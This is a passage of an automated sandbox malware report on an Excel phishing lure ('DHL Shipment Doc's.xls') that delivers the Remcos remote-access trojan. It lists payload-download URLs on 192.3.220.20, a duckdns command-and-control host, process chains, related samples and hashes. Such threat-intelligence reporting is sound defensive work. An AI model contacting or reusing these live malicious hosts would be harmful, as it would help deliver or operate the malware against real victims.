                                                              https://contextual.media.net/8/nrrV73987.jsbhvED5C.tmp.20.drfalse
                                                                unknown
                                                                http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000016.00000002.462029727.0000000001F59000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://contoso.com/Iconpowershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://raw.githubusercontpowershell.exe, 0000000E.00000002.448752677.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.0000000002B3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://192.3.220.20/97/picturewipowershell.exe, 00000007.00000002.433523996.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.473447172.0000000002717000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://stylite.io/Gmshta.exe, 00000003.00000002.417313522.0000000000551000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://geoplugin.net/json.gpwRegAsm.exe, 00000010.00000002.848958157.0000000000775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvED5C.tmp.20.drfalse
                                                                          unknown
                                                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvED5C.tmp.20.drfalse
                                                                            unknown
                                                                            http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta0mshta.exe, 00000003.00000002.417313522.0000000000599000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://crl.usertrumshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvED5C.tmp.20.drfalse
                                                                                  unknown
                                                                                  https://stylite.io/Kmshta.exe, 00000003.00000002.417313522.0000000000551000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvED5C.tmp.20.drfalse
                                                                                        unknown
                                                                                        https://raw.githubusercontent.compowershell.exe, 0000000E.00000002.448752677.0000000002551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.448752677.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.00000000025A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://stylite.io/mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462003839.0000000000482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465120785.0000000000482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465383861.0000000000482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.463988623.0000000000482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://raw.githubusercontent.com/NoDetectOn/NoDetectOpowershell.exe, 00000020.00000002.495129914.000000001ACF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIF6powershell.exe, 00000019.00000002.485749498.000000001A612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://raw.githubusercontent.compowershell.exe, 0000000E.00000002.448752677.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.0000000002B48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://cdn.at.atwola.com/_media/uac/msn.htmlbhvED5C.tmp.20.drfalse
                                                                                                    unknown
                                                                                                    https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                      unknown
                                                                                                      http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvED5C.tmp.20.drfalse
                                                                                                        unknown
                                                                                                        https://secure.comodo.com/CPS0mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001C9D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.470841965.000000001A788000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495129914.000000001AD0F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C181000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://stylite.io/1mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.imvu.com/OKRegAsm.exe, 00000016.00000002.458458173.000000000036C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://policies.yahoo.com/w3c/p3p.xmlbhvED5C.tmp.20.drfalse
                                                                                                              unknown
                                                                                                              http://crl.entrust.net/2048ca.crl0mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.msn.com/advertisement.ad.jsbhvED5C.tmp.20.drfalse
                                                                                                                unknown
                                                                                                                http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                135.148.195.248
                                                                                                                idabo.duckdns.orgUnited States
                                                                                                                18676AVAYAUStrue
                                                                                                                213.183.76.22
                                                                                                                unknownGermany
                                                                                                                15945PFALZKOM-NETKoschatplatz1DEfalse
                                                                                                                213.183.76.21
                                                                                                                stylite.ioGermany
                                                                                                                15945PFALZKOM-NETKoschatplatz1DEfalse
                                                                                                                178.237.33.50
                                                                                                                geoplugin.netNetherlands
                                                                                                                8455ATOM86-ASATOM86NLfalse
                                                                                                                185.199.111.133
                                                                                                                raw.githubusercontent.comNetherlands
                                                                                                                54113FASTLYUSfalse
                                                                                                                192.3.220.20
                                                                                                                unknownUnited States
                                                                                                                36352AS-COLOCROSSINGUStrue
                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1525543
                                                                                                                Start date and time:2024-10-04 11:54:37 +02:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 11m 38s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                Number of analysed new started processes analysed:36
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • GSI enabled (VBA)
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:DHL Shipment Doc's.xls
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.rans.phis.troj.spyw.expl.evad.winXLS@45/45@7/6
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 77.8%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 99%
                                                                                                                • Number of executed functions: 200
                                                                                                                • Number of non-executed functions: 325
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .xls
                                                                                                                • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                • Attach to Office via COM
                                                                                                                • Active ActiveX Object
                                                                                                                • Active ActiveX Object
                                                                                                                • Scroll down
                                                                                                                • Close Viewer
                                                                                                                • Override analysis time to 68589.047352674 for current running targets taking high CPU consumption
                                                                                                                • Override analysis time to 137178.094705348 for current running targets taking high CPU consumption
                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                • Execution Graph export aborted for target mshta.exe, PID 2104 because there are no executed function
                                                                                                                • Execution Graph export aborted for target mshta.exe, PID 3672 because there are no executed function
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                TimeTypeDescription
                                                                                                                05:55:54API Interceptor93x Sleep call for process: mshta.exe modified
                                                                                                                05:55:57API Interceptor442x Sleep call for process: powershell.exe modified
                                                                                                                05:56:06API Interceptor16x Sleep call for process: wscript.exe modified
                                                                                                                05:56:13API Interceptor5428017x Sleep call for process: RegAsm.exe modified
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                135.148.195.248PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  gwfe4fo1Sp.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.22755.22546.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                      SecuriteInfo.com.Trojan-Downloader.Office.Doc.20731.18439.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.3511.17688.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          QPS366349.xlsGet hashmaliciousRemcosBrowse
                                                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                                                                                                                              SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.14420.14138.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.20492.1802.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                  1723532645c07b15c8e32eb5cfbedd5867a24a5c4846fc73caca1f402dd197c798ee584599595.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                    213.183.76.22TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                        213.183.76.21TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                            178.237.33.50GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            1727849345794c209e33766caf89479295ffde722ecf82510111c722c29bca51ee334b3d04504.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            PO_6034 INV.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            raw.githubusercontent.comGEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 185.199.110.133
                                                                                                                                            SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.110.133
                                                                                                                                            PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.109.133
                                                                                                                                            FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.109.133
                                                                                                                                            CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.110.133
                                                                                                                                            UfsYHroDY1.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                            • 185.199.110.133
                                                                                                                                            8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.110.133
                                                                                                                                            idabo.duckdns.orgPO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 135.148.195.248
                                                                                                                                            geoplugin.netGEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            1727849345794c209e33766caf89479295ffde722ecf82510111c722c29bca51ee334b3d04504.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            PO_6034 INV.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            stylite.ioTTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 213.183.76.21
                                                                                                                                            PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.76.21
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            AVAYAUSPO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 135.148.195.248
                                                                                                                                            MOfHb44mph.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 135.35.203.55
                                                                                                                                            yakov.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 135.8.246.92
                                                                                                                                            OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                                                                                                                            • 135.125.224.84
                                                                                                                                            http://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 135.148.128.253
                                                                                                                                            https://cancelar-plan-pr0teccion1.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 135.125.180.59
                                                                                                                                            http://urlz.fr/r4kuGet hashmaliciousUnknownBrowse
                                                                                                                                            • 135.125.180.62
                                                                                                                                            SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 135.83.183.30
                                                                                                                                            gwfe4fo1Sp.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                            • 135.148.195.248
                                                                                                                                            jade.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 135.60.242.17
                                                                                                                                            ATOM86-ASATOM86NLGEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            1727849345794c209e33766caf89479295ffde722ecf82510111c722c29bca51ee334b3d04504.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            PO_6034 INV.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            PFALZKOM-NETKoschatplatz1DETTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 213.183.76.21
                                                                                                                                            PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.76.21
                                                                                                                                            yakov.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 94.176.172.127
                                                                                                                                            154.216.18.223-mips-2024-08-17T03_44_00.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 77.72.217.98
                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.206.184.75
                                                                                                                                            http://internet-scanner.com/?rid=ecXtVpPGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.73.232
                                                                                                                                            KCM5U9fQEI.elfGet hashmaliciousMoobotBrowse
                                                                                                                                            • 213.183.70.203
                                                                                                                                            http://gslb00.www.bancsabadell.com.as60813.netGet hashmaliciousPhisherBrowse
                                                                                                                                            • 45.148.222.10
                                                                                                                                            WCJX7dbLAq.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                            • 213.183.70.201
                                                                                                                                            loligang.ppcGet hashmaliciousMiraiBrowse
                                                                                                                                            • 213.183.70.204
                                                                                                                                            PFALZKOM-NETKoschatplatz1DETTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 213.183.76.21
                                                                                                                                            PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.76.21
                                                                                                                                            yakov.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 94.176.172.127
                                                                                                                                            154.216.18.223-mips-2024-08-17T03_44_00.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 77.72.217.98
                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.206.184.75
                                                                                                                                            http://internet-scanner.com/?rid=ecXtVpPGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.73.232
                                                                                                                                            KCM5U9fQEI.elfGet hashmaliciousMoobotBrowse
                                                                                                                                            • 213.183.70.203
                                                                                                                                            http://gslb00.www.bancsabadell.com.as60813.netGet hashmaliciousPhisherBrowse
                                                                                                                                            • 45.148.222.10
                                                                                                                                            WCJX7dbLAq.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                            • 213.183.70.201
                                                                                                                                            loligang.ppcGet hashmaliciousMiraiBrowse
                                                                                                                                            • 213.183.70.204
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            05af1f5ca1b87cc9cc9b25185115607dGEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            StatementXofXaccount.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            UfsYHroDY1.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                            • 185.199.111.133
                                                                                                                                            7dcce5b76c8b17472d024758970a406bPO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            Request For Quotation- PO22719.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            QT2Q1292300924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                            • 213.183.76.22
                                                                                                                                            • 213.183.76.21
                                                                                                                                            No context
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):402
                                                                                                                                            Entropy (8bit):3.5728344496084112
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6lJCQx4b5YcIeeDAlkY+p94/9ywr2QIySNosb3fxNa/WAv:6lJCNecj+09vrdQ350/W+
                                                                                                                                            MD5:B701AEAF7F3B971814FBDB5FAE2E7B6C
                                                                                                                                            SHA1:22F8E48B82533AEC8A67928AD1EB96D84DBD5862
                                                                                                                                            SHA-256:4F5D2A540C94C210E81CCF9A6D2DAB93F68C8FB3D8593A765D4B68F38BF1F90D
                                                                                                                                            SHA-512:79B8B50707D3A209D0D47A0B47C08BCD1ABC0AF23498DCA3EDA2E82CBF81A43AF29B7796CAAA9FED1E3D382FE4A50ABE2A53D5182343AAE799FB0E846034A8E9
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
